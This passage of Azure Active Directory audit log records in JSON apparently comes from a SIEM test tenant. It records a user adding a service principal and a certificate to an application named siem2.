"ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "AccountEnabled", "OldValue": "[]", "NewValue": "[\r\n true\r\n]"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]", "OldValue": "[]", "Name": "Credential"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": 
[{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": 
"restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "[\r\n true\r\n]", "OldValue": "[]", "Name": "AccountEnabled"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", 
"NewValue": "[\r\n \"siem2\"\r\n]"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS 
X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": 
"", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "[\r\n true\r\n]", "OldValue": "[]", "Name": "AccountEnabled"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]", "OldValue": "[]", "Name": "ServicePrincipalName"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": 
"48403af8-b712-4e63-a999-686b631240ac"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[]"}, {"Name": 
"correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826392"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, 
"ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "KeyDescription", "OldValue": "[]", "NewValue": "[\r\n \"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\"\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "KeyDescription"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"KeyDescription\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": 
"auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826385"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application \u2013 Certificates and secrets management ", "Id": "20a82fa1-625b-491a-a3e8-54d779a9b17e"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n \"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\"\r\n]", "OldValue": "[]", "Name": "KeyDescription"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "KeyDescription"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"KeyDescription\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": 
"2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826385"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application \u2013 Certificates and secrets management ", "Id": "20a82fa1-625b-491a-a3e8-54d779a9b17e"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", 
